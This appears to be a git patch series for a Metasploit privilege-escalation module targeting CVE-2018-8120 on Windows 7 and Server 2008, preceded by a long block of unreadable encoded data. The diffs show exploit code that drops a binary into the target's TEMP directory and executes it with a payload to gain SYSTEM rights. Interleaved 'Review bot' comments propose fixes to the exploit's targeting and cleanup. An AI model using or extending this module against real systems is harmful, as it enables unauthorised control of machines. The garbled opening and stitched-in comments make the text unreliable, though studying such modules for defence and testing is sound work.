z6Ue(6?x?nKJ*2@!d6)8cF+L>~Hge@5O;U!PLz8k^Y%Ilxi#UV=Wr2`8(sj7eUS3xY zKcDY&i1QzX(_TIjj?l7*FKwi%guf*!)tZJ<7UkGzci|){BjJelQa1wpI>Lx+%l}uW z>jFa8v=XWeQ*;%|iAhpqrtV7d#ka**3T35qYylo}W0vw4zLh*m85F3P+Bu^=L|uL( zsC6cPef9L06LPK!+s5BwmF@x+cLDWV*I3D6du;9WYUh`)9-r{aegDn)I`fZ7S+m@~ zoO+?B$x~+fHLYSh)WuZFeW-w$jCUCn z(Pb|#Iiy2)Sjt@bhVG;-A9_jaASsiwlD0u&6T2MLB6vjFRB^Y_I!g z95l48EKORpx6>vK{&731>%8!&_4EFha5?0=|-k8$(VvpdP%9Z zQV*nES%yxir0F4TrhKtXwEz{k<*J-ZYJ?urHb}i$u0m)JOWdV?UWw2DZ_wLDZiFjz zs-?W8)=B?XK&$BjCG93(2ro#FC@rmULLPt3-oVV6<`R=m(TYyOdj+aIq^%xATeKKc znd)D@+={f*Q#k0$l#+JS&DS16k#<%1N&jvCay;P|QCc~~TMVyWUdP(oQ*jsiOQ=Ex z;a=VMcWga%|F=Yi7Oi|pPL>mX8FprUZ|||k8`FqA1?o=4-uZ!?nZ_(E#YqtAtVuk!ES45CtFQ> z9lpf26eTTWu`x!)F%-HEMJM5zzjRWxScM{eTOKL28MCkxuF<_lsxg>wwuFp1 zUBiq~F)_0s#*-9i6caJ!#hchEC`H3&H;f5I~^l0%^X0PGhNGaO7ly~T*{7sX69p`o9WJ3ymX=` zr!0qCK3xI7+Nrdpq-bWrGFKVtY4hK~a&}IEdqPRsWu8-Wii#EyX1S4CR8sD`%vJKH z)6?!C;fQ^wI0BZJg`sRG6nV~=ifKC<57L^ngES^$OymYptX}l{h$5Z4UUsN={ 
zpbR3HlohyCT+U+8vdoHdw`aoF0?OMR+>}h%5;|%6feO{eB&t$$h0hn(h#%u zJgGRZM4N@g9o@6aU1fndwb!XR%UqJTN#*cCL2f6@DXHl>rERfw${%Hrv&1ziSK^#m zuy|=|iKo~-GEVuKP*CKO6iBLInsF6rImNj}nl&WPS8<k zIFq_G+m&m~%=f@A1x99$TikMUn1tf45I^Oj!C$e~8REZ8SrP}|DSv$HDN{Pbn4D8= zOmHnS(sRm;l+rS=!kA2)lRZU7if0LQEj6Ysb{kVmmK)<;i^V_nu0p;kQyQT|PTAso zknam*{?7NR>3++h_eoLqiG zZ0Y=LqN(6#q@^V-Tb3lN1ca|zdA?CSEP2N)37O5`Tu?@k9&iG!S%LB|<0A7rnG33D z0^hfrbvWgOp?&D^q&;l6(_xo&urcE?zmj+)J{gm?+fBxC~&L9;#YhMaOP= zsOq5yt9pfo(zCB!yEfD?Vq&T?s@Bm<4;q+|F}sR>o6bEWV;w=*234)A;wyvhJwHD` zEUfE_($f1%OTW~wGh{F}2kXn5w}R52ZU?1*-vJVhQ4cb{Fb;!^9E=m7^z#j1H_#8t zh^HBpF+vL%0UDMR#+eKxz@A_vC}M?CU?gY*Wj$;Vcr6$MUI!+Cy+8+eJ(vb^h}Ose zWu0secoVn~ly$OvP}a#xL0KnT0WwB0sz6yUTL;Q|*<+v$+z8$ZZU$w&Y%ACg+z$2! zcYp)HTJUzT9vlcB24%!`0=yG!00)D9a0u88MuRQjFwh7|VV+O^!BJo&m;gqBiJ%RX zk>en6EEoeizyvS_bbzT~8aN)z04IQRz=_~Oa1xjgP6kWCyTBEo^c7X$G;kf50X_!K z0yl!vo^J;42DgGPa67mP+yMr`06W28upYF4$H5R#`lnE^0dp7dEZ7xn0mHzMQ1}A; z>{H%80wXa;fPKIo;2^Lk7zbKG2N(%X0j~k2FT56%zVJG54)(pkT=06Z6ubdk2}XhI zz?;AgU~h0Ucr&;S>;vuqzXt9FZvhX3eZf@z-Vv{I1GFY906_u%jG3FK{Dx1Gok34Q>a&2G)Z^z~i7DJPVEi zTfkH>q#Nl1`+z|-R71cJFahiejt9Ge8DMwt9xwvT2YZ8V&do17pDMU@{m1rh&b|nV=mk z0)uE6SAyNZbzpaJ0~i5r2780sKs&e>45Fbt4t4_@!0zB#us7HO+QG<%V?c5uA7_a`0V4lWdTut?m&72-aK^oTpSLEOR3Vn2lRh&{MN?7_WaA4B~Vd+?Ol zgMP7(qkf7#XhdKSMu0&H&`Zo(vLP*1^- zmDE$PH@F#;ws0I#hJhr}*oxh~p!AvYdk*snuoiq1JP7^*JOOS7PlL>Vjb`vw@FMs} zFsw(4aTM$YJ`38w-+)8Fy__AhE{`35=a!C0Gx>AojQigAJISVvjilJd0WSnilY3P{shEU`WptMlR$N zvy2TQF+T#j4fpB@fqeKP{ty+gGOYE8XL>lt2@RB%u~Q9 z=si>rb2(_>KOE?fc>@>&J`E;=KLgXibZ{p4Jh%|t32r1D8LJdwUMKdLWlXaIvy2(S z2sZ*;gIUHNHr!%fbcYrr{#I}!}LHpO@VOvAkw*bDP4Faz`TpbhhEa0s{&OaRw| zY2XjQIp9`7{NDiPW1a&p#C#*@#yl5XM|{a(73Q_zdhkc!MsPW}1>6Ld^4(3~cFgm@ z9hh$ecVf;3>%o`66W|`u4{irrz#U-Nbt%RxU=+9?T*3Ff!9kes0i|t!4~)aS8=M0E z4$K9g0at=gfK_~VGq?fse}J38Y|ueIV!>^g?+3SHc7QuDKLX}sP5|pMSAnIN6T#z{ zSA**aw-4BWc|Ld+ECwIL{%c?h<^^B|-^GI=JW{n1+={ymjKsVM+=%%Wun*>iU>g48 zz(JV54?4iFgAMo_2+qM=0Oo=vU@2$;tH5``$H2$HP2iK@R`8eLbKsA`T5tk*5G)1t 
zN`OIHgzF9Z8mXn`+Egligwz(XFIOn53i6YkBKgUBtwzbcn6N@?A5MOH zb;Q6``;)yP`N?{j{A7Jhe#L=sWrbdTvbUyD`u z1;Wiyt%&4L=Tmm@^mqDukyDZ1(t!V^f$+*zDD{6xM&ezN)qjc7(Ecd2k(O7BE3JQB^9GtdiPM8koTl)g;q#a{R$8rvyK??IoY+C$+Jv6r}n zS42M(z3@jgJ(c(`CUv5phFRTgIYr5v@syu-IrZzTQl?P5jqiE3UU^~j{Hu1n_EW}T8!mRy^4 zOG1&-HQ+Fv%W;Z|!pA}*P4{Jrrc)J-q>YwPWn3ifuGBZ-KfTVV(;@Ayge-lww7J4( zLPuR^w0~V^w0*J4k6CAgrWt`UlW#LIb><;m2Xwvd$Y-gl-6$d^$*-hM*Ardd;}pF* zmSso(X8xUOhGe!kPQ?p)ZzN6esm`+=2kAWPv69ZSZijT9Qxz|ltNiOcbc|1@Pv^mm zJ3~>)jC+bIDIIsFN{5bnifSu#+&T^&_ryTm6q;!o>-J<^ARWu-*UTDV#xY)%sg5IE zmAn~;ZVQCZbh+y|M0Uk2Q=N`Qs;niB%gac|r%S+$Pj>B1UYVqFtHaGu_L^?#ssuFM zt{kq^BF!ykxHDDRYMN-C)!~YyfbfFmK}lohG7za1lS|C7M7F?8lY_<69lx%zoxjmFQKxyFDhHDmQde|6o2=5W{mfM5tNrMCi1srj z5TC?-w;ES#Kbn)ZpSuF~;wK|eUnLi*s!!2=^juwko27V9+mGwuKcj>F^gvlkIJ(u) z-)5>7MeEZ7ctuIug8?9feMlf1mq{h6azM?Hm;R!Q*kvuZ>_ja(C*4VU{(Tb_py_^oS zB9Lb3J9I0xxI_D-ZS>zF+|B+`#(dGFOv2RT96cJ={fo%ch`rEo5nn~q;gAx($%OroBikwd-Y+r^jZ|&_|EZ^tei7 zUd+0aLyuzW7pZh;KGvgpQ!i=KdYwM4FHmu7eW5A?tuO8nPO0JpZLde7S}*%_W|*3X zwEg|6>^1*M35g#~$C5U^NKTpdBDd78Z}*?u!Cvn<>TopOwSI}Bsn+MKGSm8HYJEWK zMHbBrUyq=*y~y6S+qcJCs(3>Cksi?WHK1!OFu*cSW(?!z*$~;q#9hWHj z=<(lD#aDV9rqg4NpR`H7kul~{m1mg`iC$)@dR(k$VtTx+XJ>lMr1@2kbLFp$Nrf&t zRNX7+S&+<)+U+%8N?q5z%`#QSdORzC&3T5Nk?OIOE;Fr{zv4&Qd()4Esq2FtpXxN| zIf|aq>N$$+mYeexv1uP0itM`l%<+om{&utGTyuV-XT^Gcqi4o?46EbS;~&j`TCdZo z_3~Hx0~wp^S+t&`h!mmN>wepukDF%wm3Ei0PDgh!cXSuZ=-9P?p-#J5=363BCvGNR zN^2_fQgeLSZr`yD*8b%L!j=4M`_BGlj%Ct8^k&{={vncRk_L%aT%=df^J|k=L<*r@ zFY`gYx}fJ%y1ZqbLF}bm^_)eQhn^3LWQ5Fd#80W>Q9VZ1e>>*6qkYFb=sDnW=xxs3 zbiBHMm%1pekGYN`X5p%KvwWxh=BxO%UgTv>`*Ky+w7pxk<9c4G<4I+dB;&y>#u5D` z;Q!@6n{oNSL9B!8f0w&l$(+V&_uu=shE?Rt|8@4insrI@Uy$+D{&fuDLDtR9f5FCA z`)7V{`(IxAlKn52s#*SnuHg1%-~R_VAZT^lzo4)9GfPnL!Jzhk!9ic`pZWcl^YdS| z3H!VJZ^m?p8C^UZ#TU2?t7>I z{Qd|2#xqT4|MKBS%^!dA>1TgEcfRGq=YPBS#idpwDA*Db+NEn)x9;H)J$hOruetWR zUf17nW7JK(Z|?K8Tl(5=y{%vW0k;nvbjO{8heQt@7BhTAY+U@vQ3;7j_Ty`k&7K|8)HSH2qV? 
zrH*$_n3y(c@?BHXr%ub5J|lBx)~wlc=H9L8e|7hN3HtxD?05C-eI@o&>m#yX`PmO0 zhHG#PSNwDLRlm%sDN_X}O_eoyLD>Tv-fz0H7dh&ZC304vP4>Nmbe<(|^gk}|g|cc}TDv#hM7EXk(MG$;vdTV75)z$GesnEOw1ALwdZ73z~?} zm20=5AR$k=qK2IRTK9JM@a*bo6PY<#2+ayfnwXIDcl&q9T>g)LG8x5i!FP zq7#OXh_Sg=lopi~xNVCnYz|K`V*h1>^4;#z@}yzImK3=2J&T4eE?G8AyWAmUGO|Q! zK1n_lO4x8-h9rM?=L%?9)WPAlVwcoIcM-)s z3*w2yye_Ay9ZT0HgvBjTZd2WX;&sg`D06#qiqc)nN|0%n@|XbiZSE3VnX9~{Xt~RF z6~BXGRt%VP2TaiM8xE0_EVju(B3mgryjAil?)r>|J{S;?>z}QPxh)j!k24HcIs?$j ztCT&NwLvkWfHH2|fT9&c?kg#S5dtRRP4PFgtY8U#IMiWV?kOsEmE|ldC@OGQ3>`XD zxle;E_sL0|;w4xS3?EK)PxrXWDkgETrfj*Yba}92=X|!)=1P9sGbL$o7P*#Fk4OTC z1C|ri5|>1;;!iDdt|1 z`70~OnSAABby}Yj6AFmjzs#*O`637Tj(gbib1}1&bvV5~F^?IZ#Ft8Za^hM-)@Rk^ z%&AC>&&E~0FwYa-ioC=CW`)^G4oLDBC@|Y%bzUjgb{{NnD=nbr<=(1Of!u&f&42Gt z)d*xSZVSi}AoS2sg`9*4n_S_?eMGHd&7(I8P4mKA9Ll$8mWS=c!ZfG$)$U@~1HEZ~ zc{oi0e^+z=xlM;-x*xtQo{-x*yLU{-@O}=%iISiB{oc#IUp1(+`{m(h4({wOcf55B z@8Kbx-8;rF{=PS~v-{=YuN~IeT`ohE@67a$yr;AK=UCY8Z(0X^ zM}Kn*9YzsKerEiam)GE>o!vWr?fmoYb_V_$I{3@Qu0Q@xbg)~4T_5bO^!xYS zHUGW4Yo-Tvyjtc!5Pd1fA7%W(*-6)IP3xdbZmGZPmNZvRsX9Px3{!eFN;3uoIb|?%*^yzxc*-)x zm9zZvqr^xBURI{aj9Mm@k9RHd$Y3Y~VsntzScYAoj7!QUaQ2uXzUlUqSvHi5q{%RD zB@K&9a$OlE1(FuylAKlSV9t{-I`V@$uYAOk&KcZ-aTRXY%#zs!xvtdwoHFANp{90b zNt?S-Dlg49`K@!599_>`te zF=JX+YKCEa*uhM);kPjohkP@$0`?0JrPMocYfo_v)B$}4nj^Z#qA#ZlK8+4hqrwbV znL4Ulyx64<@j|uk9YP7vo?u=RTYV&1P8Fw=t5l#f28xTbczHotN%1lYO&=L9C-2`2 z5?c4eG$U1Vbyepy%T>>(rxfRAmKGGNd>AuAGmBiD zip>d~=_+Gd!b#~sX4shso!NFC-XnT4pwGcC7ZcHIlUq!R)qm8vo|CsSI8&XOP89}Y zkZ){}(n^tXdq^lU&6zIxU#T+8kmkks+%nDMF7b{h?v>rzV;r_45f8p7NvtN1>SBqRMSbs>}as9}7^GNt_tH!=NQm7zL6 zF8qVd?m#;t5n%k6{5ht--;6Zc$Ao>c8EDOV5ZSg-^>WuX9iH}w}d|zC2=zdQQs{CZKzUIAC&C3 zN?Ii!;=c+dXL1~S5g0kps(UJ@~S`mf$gfls|5J}ruEhLg>-(dzOeuQW`4hNs;|l( zff2w}*~9jgqxhHh`2P>a2nr4f+d7J~qI8@KAFO!r)&R|)d0T6qd|Kn`A2eJPo#TNj zggNdHufL-Ilz{)|@&D>mr=RL={P`*WQ*zR-^RF%Z2cA@4 zOsAut{^tBQZN`E(3*Q{k*)yiq$4&BQ5NZf21{H@&Mx~)LP~v|MY9T5g zRf<}PT7!BFwF$KuwFR{uwHIafcZboRKsBKJsAg0P%J_sdp`uWOPzk6hsD-Ff)Ed-! 
z)CSZh)E3k>)N`nvsJ*CzsN<+psMDy=P+^~vUX=K^fkRLUs5I0)s3KGqY6EH$Y71%y zssSZ;ZN%_UteJL5e%0UJq?Ar>|BPAUyF5QYl<3#`DUk)C+dH1oY4qNm0e_c9w>ra3G zy#mMK>@NoVx%Z>fZfdG_-20u^A5ZNWT64$GzwfxPYxDTOtiJXes~`N0V^{JYpLw-) zQr{K3k2y;AHLP!}Ixz9YZ*NW6xpryRz{HyKr41{`?flcDZ(aD_--)lmq|yUE3qUGZyY0AY#YH9}fOO9w6iQ zx3Tw*?*94@OXW|?*t>J>Z%?cFZt=C%e;vE$*bvuE@6NgLg(Dx2J#6i_X5!5gxBdP{ zAC7fA^L#Y=8wv7>j6yZ_IB+_3Al5615P;)_E$Yp%KP;7?AE9X4g&JL!90 z+VJ@M2gZJDZ>HTd{tvxg`j4NFeQU{!8xoyAz2z6LZW!CY-@bQuzGxqwrrH zzux6wznS+{w|;Z==x=_WbkqHd2c!mAp<6zjvg5|E%RrGmJayF+>kA`Z|$!9n}6Re-~V9U-Lt=$yep&nwy3FhxfXp< z{f(b@*-&}S>FBq9aOh}#$e*4$ai!69Rpj`#cA$!l%rCVGQYQcY{j(I{o_>NrRdo(Y zq&2y-;0pF~4^tX$3l|0%m1g7F;p617E0z_RvInCF4j&pb(B_hLWcIvA56qf5Av$58 zt=!FOWlm8^v1|0e3Rn5Sv1594PtGYX=O(>}~2hzASew z_8=cn5iny@=DL?l29Z0-Fn9CI+Z;POJ6G_jti4WgEk`;9Aplp==z%%qlZuy@AgD0V z<|#;7EVuiQ9+;O?RPGvR8`c(1^02GNl02+anv#dLWsc92hnaN4(4iczs*U8X4$3Vg z=C+u)n9(t_Viv>{#&}}B9`kI>FJpcivpeQc%=U1B3*Z;2ff>x_LM_CI2ujD05daO{V%pT=H@9TpcKmmgOaw=(XbxToWu zkE@M)IqrDeTX7%7U5K;9_lUnSeqelT{M`5j@s;ua5&um5-uOSpza9VQc+1G{BYTbP zJu+eBypcZ{d1>VGQ7cFN=crdlHHf=$p6Kn}F3GoTj5@sfRkuWH6WMWq0qlw!S z-$-mtj7qvCX=qYX(!``0Ntcp(+OM~duqW6j+Y9XL>_4#o%>Ea9*W_Nw{gR`T$0kor z&PvWpb|z=C-5hsY+#PW-aiikK#5v>A5668o?#Z}c z#MMEicjB&(zXQtT#OKFX#IK5fGJbpfj`+Ixm*daI$3U06M$UpZOGn-}a^=W}M}BkU zk4Dyy%pbLC)cR2yM{OPTvr)T7y*28yQI|%ABv=zhB#cT(O-M^vlCUS?Y(i^-HF0WU zUSetD`owQ1K9TsN#GfYaPCS>qP!Ow`yhW9x*DG$67r79aELm``Ia#`GS(e)!xG>qdNY#0Mjq zNBkl7L~IjptqKKRgA-mEdHtwcMok#CdDQEpZcP}IurXn9Vr=5%#Qek`C*G1|*d6w} z?9)ldkmPa6Imz3Sf0cY7`B?JxqeqXKF{WaS43PM5>>S=Y;{Ld*xM$+F#T|nGzCQA! 
zgijOBC;SasSQ5J?h9`cO_=BWpk`5*vOG>rRv9GfKVa$t?)(kmYWEew-#|^)G_`>0< zhOZrNi=7-lHGW3?toXa*=f^LK&x@ZpYU-#*6YCOROFWg>E6J9$FlklNb4jm4x!%xj zIXqWqzczVw^4ZZvW1bjuWXv05lEym57K~jpcGK9cV_z71YOJx)FdE>kTVhILDq{XK z=J}XcV;W*UiRn80n&CGN|Jv|=)VuY=`@{~8T@+g!`%5_L<=8i3Ps3BU#N8e@IBqul z^FUlp+;`%B7ky;>XpMEsWcU&a3}eoy?d_>=MP#5c!(9&e1a zj=X7P-;u*d+DE30yk}(5NYBX1k&lnuI`U^DpZovXJKx{7&N2+UEU>@=c$HV8VVKKY z2q={EzCP!?zt71wcVt=wY01E_vA+0QCO38U}^R!dyIX9 z9b-f6X>@IzJ}HTy05JzHQG*hOS`mA%RS$!_Kid^5kD-@&)xJ#>_F-okhA z`}wDMg74uy{LB0xe}sRX=lB5s7XLOs!N>Ry`3wA~{O9~MKg&yef&Y=e%CGV&e}n%6 zy{s3viY+26qT(Zhi+e?fco3`{L~juS9m#gF(O^_l;1|7pMIU-APfoMi%zK124C?~_yH3^_+`kQ{xU{)WCp&(rJl zme>bl+haO*SF9ZlJsB&^;)nP&>U5bO7TcwbWPeQ_my7ZOlKnm<)Z^;7dQlbC zpVcN^uRC-vGV~K2HQekr-!U(mKbYfScFNoBKj|;}SJpF;#rsk4@OEpTb#SFyJ`kHc2KbY6Fqd&E7)Px3eUUU3wr*`fBTK3wyt%Bw*&j9gq&Z$;IE zFmj^~>xho(CjGF^=sum*Iei5_4x0Cvu!)$c*+@>XFq4(={U|a&N-*zyvyx(PlNN< zT#tQ{?PXtN`{B>)>;^l;kHa-N@q{=jro^kFRqm9Zm0yuh$REfb$+L1E6}&1N)ccjC z?p7VDM`hGE)d;d)Q0LULx=G)rKct1eUk66lKl>C2{LWgi4vP0!tij%F zZ^1m+YHve^*C(aGOo-d9_9yIJcEawozhL)ZF1%(3-A1>-b|Dihe3b{pyTvo&1#ww) z$;WV2iYk;qVUPE)ci4L;w*5W+MSuOEA`92OHmnV6Or+J3| ziqG*P7@Ox(>=0ezA(6yvNsA%z3vpf4#G1gtlCoYl$e;|#J+fQ&%A`!mi|VQM>z1&4 z;NgfBC%Z|K93!X62k0I>s4pXsdF2!(S+To+w9t|cH?fF+X3@-!@X(D@SHo~ z4!R@mm^%Rj&%nS%^lSHrTaObfep8(I;})CI-cb7!wmn%#4^7MKOE8I{fOkd|@TCOc#&Xh_Pm?2|b;AP41$9Fr56o-=Y5(|8`9UY09zRj$c8 z)u2KutfHzJ+lW?i)rQ=4s&183X;>wT{VorujH+=psiu*`IaN{%s;nxis%k0#zXf5L z2n=Isu3L1gZr2HzzE`JUoUHDL>4){G9@mq4S{L-3E@7uB>x!=GnhuzH6Eux5QIoOY z#}>?ic9Sq&rq`rQ#$-*u$(vy_3PVl8P6acER4$mZshFy%85|Dk1!1a)*W_6q_gcJG zuiZ;{UD%IOUdGFM{a)T12KD3Me%dQ|b6&|?@XDAeRj=j+{CXsz5tF6Kw|tHbqSbHr z6MmQ9>!8izwB2)d=12J+Bmx`VAWeetI>*BP59se zw_2=LtKCXiT~@D^vNBfI>bLUNur+FpTa(tbRlu%Wg1gFA#j090Shb!6Nh67nCTzeQ z_XMp-WCDroB`G8_OZrKk43kkZPA17TDUdl*A`7HUDx^wkBtYwFkT&8TqKR6R(-zuF z+i8M!(O#OO8Jfi|n5V-u5Ztu!cgl=GRwJ9%SFykt9j6sq9}C4S%*j-2AeN6!;$EW~ z3u2>gw^PXRFcLh2`;0O&8*m~{i__&~ol&RYl(F?hkh~WBGcw%cV&7V?MFfe?Air58 
zxE~qLBgMnWaZ${Hz!Df-0EK06SOJMuuvi0)I3icogUBG5Yy_1NaM=VhEwIT!XAAgj z1)=R=GyzJxz-cc?O>K~x1FHl7nSmo9b_~o;fZ8c=I|FiO!EO=s&V%125WEbAS3vP9 zI9>zEbzu3wr)D#zcQ Date: Fri, 12 Oct 2018 14:47:05 -0500 Subject: [PATCH 35/39] rescue-from-method addressed --- .../windows/local/ms18_8120_win32k_privesc.rb | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index 2db367e426..c8bcbaeb08 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb @@ -68,17 +68,14 @@ class MetasploitModule < Msf::Exploit::Local end def write_file_to_target(fname, data) - begin - tempdir = session.sys.config.getenv('TEMP') - file_loc = "#{tempdir}\\#{fname}" - vprint_warning("Attempting to write #{fname} to #{tempdir}") - write_file(file_loc, data) - rescue - fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful") - end - + tempdir = session.sys.config.getenv('TEMP') + file_loc = "#{tempdir}\\#{fname}" + vprint_warning("Attempting to write #{fname} to #{tempdir}") + write_file(file_loc, data) vprint_good("#{fname} written") file_loc + rescue + fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful") end def check_arch From f78ccbf9951d616e3dc0eb3b71903195cb875e90 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Mon, 15 Oct 2018 08:32:58 +0530 Subject: [PATCH 36/39] Indentation --- modules/exploits/windows/local/ms18_8120_win32k_privesc.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index c8bcbaeb08..1b8f396bdf 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb 
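Review bot: `tempdir` goes straight into `file_loc` in `write_file_to_target` (the `@@ -68,17 +68,14 @@` hunk of patch 35/39) with no check on what `getenv('TEMP')` returned. If that call can return nil or an empty string (not visible from this hunk), the path becomes `\<fname>` and the write lands in the root of the current drive instead of a temp directory. A guard ahead of the interpolation, `raise 'TEMP is not set on the target' if tempdir.to_s.empty?`, would send that case through the method's existing `rescue` rather than writing to an unintended location.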
@@ -22,14 +22,14 @@ class MetasploitModule < Msf::Exploit::Local attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. - This module has been tested against windows 7 x64 and windows server 2008 R2 standard x64. + This module is tested against windows 7 x64 and windows server 2008 R2 standard x64. }, 'License' => MSF_LICENSE, 'Author' => [ 'unamer', # Exploit PoC 'bigric3', # Analysis and exploit 'Anton Cherepanov', # Vulnerability discovery - 'Dhiraj Mishra ' # Metasploit module + 'Dhiraj Mishra ' # Metasploit ], 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], @@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Local write_file(file_loc, data) vprint_good("#{fname} written") file_loc - rescue + rescue fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful") end From 6cdfe604d4d6467b172ec13f26eaeafbac92d72b Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Mon, 15 Oct 2018 18:29:15 -0700 Subject: [PATCH 37/39] removed exception handling for reg_file_for_handle --- .../exploits/windows/local/ms18_8120_win32k_privesc.rb | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index 1b8f396bdf..6cc6434190 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Local attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. - This module is tested against windows 7 x64 and windows server 2008 R2 standard x64. + This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64. }, 'License' => MSF_LICENSE, 'Author' => [ 
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Local vprint_good("#{fname} written") file_loc rescue - fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful") + fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful") end def check_arch @@ -108,11 +108,7 @@ class MetasploitModule < Msf::Exploit::Local cve_exe = write_file_to_target(rexename, raw) command = "\"#{cve_exe}\" \"#{exe_payload}\"" vprint_status("Location of CVE-2018-8120.exe is: #{cve_exe}") - begin - register_file_for_cleanup(exe_payload) - rescue AccessDeniedError - print_error("Failed to delete file at #{cve_exe}") - end + register_file_for_cleanup(exe_payload) vprint_status("Executing command : #{command}") cmd_exec_get_pid(command) From 9e069c95f5118a33012ae53eaea4067391164632 Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Mon, 15 Oct 2018 23:26:08 -0700 Subject: [PATCH 38/39] add auto targeting --- .../windows/local/ms18_8120_win32k_privesc.rb | 26 ++++++++++++------- 1 file changed, 17 insertions(+), 9 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index 6cc6434190..9d29ac1618 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb @@ -37,6 +37,7 @@ class MetasploitModule < Msf::Exploit::Local 'EXITFUNC' => 'thread' }, 'Targets' => [ + [ 'Automatic', {} ], [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ], [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ] ], @@ -57,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Local )) end - def validate_target + def assign_target if is_system? fail_with(Failure::None, 'Session is already elevated') end 
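Review bot: Only `exe_payload` is registered for cleanup in the `@@ -108,11 +108,7 @@` hunk; the binary that `write_file_to_target` returns as `cve_exe` is not, and the removed `print_error` named `cve_exe` even though the call covered `exe_payload`. Unless `cve_exe` is registered outside the hunk (the enclosing `exploit` method starts and ends outside it), an authorised test leaves a privilege-escalation binary in the target's TEMP directory for the system owner to deal with. Either add `register_file_for_cleanup(cve_exe)` next to the existing call, or state the gap in a comment such as `# cve_exe is left on disk; remove it manually and record it in the engagement report`.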
@@ -65,6 +66,18 @@ class MetasploitModule < Msf::Exploit::Local if sysinfo['OS'] =~ /XP|NT/i fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') end + + return target unless target.name == 'Automatic' + + case sysinfo['Architecture'] + when 'x64' + vprint_status('Targeting x64 system') + return targets[1] + when 'x86' + fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64 + vprint_status('Targeting x86 system') + return targets[2] + end end def write_file_to_target(fname, data) @@ -79,20 +92,15 @@ class MetasploitModule < Msf::Exploit::Local end def check_arch - sys_arch = sysinfo['Architecture'] - if sys_arch == ARCH_X86 - fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64 + sys_arch = assign_target + if sys_arch.name =~ /x86/ return 'CVE-2018-8120x86.exe' - - elsif sys_arch == ARCH_X64 + else sys_arch.name =~ /x64/ return 'CVE-2018-8120x64.exe' - else - fail_with(Failure::BadConfig, "Invalid architecture") end end def exploit - validate_target cve_fname = check_arch rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', cve_fname) vprint_status("Reading payload from file #{rexe}") From fac05db1547586d551d9f4654b2b360eccc2f112 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Thu, 18 Oct 2018 14:30:20 -0500 Subject: [PATCH 39/39] Update rescue statement --- modules/exploits/windows/local/ms18_8120_win32k_privesc.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index 9d29ac1618..d571720ef1 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb 
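Review bot: The `case sysinfo['Architecture']` added to `assign_target` has no `else`, so any value other than `'x64'` or `'x86'` makes the method return nil, and `check_arch` would then raise NoMethodError on `sys_arch.name` instead of stopping with a clear message. Ending the case with `else` and `fail_with(Failure::BadConfig, 'Invalid architecture')` keeps the fail-closed behaviour that the old `check_arch` had. The positional `targets[1]` and `targets[2]` also depend on the order of the 'Targets' array; looking the entry up by name, for example `targets.find { |t| t.name == 'Windows 7 x64' }`, would survive a reordering. `assign_target` begins outside this hunk.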
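Review bot: In `check_arch` (the `@@ -79,20 +92,15 @@` hunk), `else sys_arch.name =~ /x64/` is not a condition. Ruby treats the match as the first statement of the `else` branch and discards its result, so every target whose name does not match `/x86/` gets `'CVE-2018-8120x64.exe'`. The hunk also removes the old `fail_with(Failure::BadConfig, "Invalid architecture")` fallback, so an unrecognised target no longer stops the run before a kernel-mode binary is selected, which may destabilise the system under test. Use `elsif sys_arch.name =~ /x64/` and restore the final `else` with the `fail_with` call.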
@@ -87,7 +87,8 @@ class MetasploitModule < Msf::Exploit::Local write_file(file_loc, data) vprint_good("#{fname} written") file_loc - rescue + rescue Rex::Post::Meterpreter::RequestError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful") end
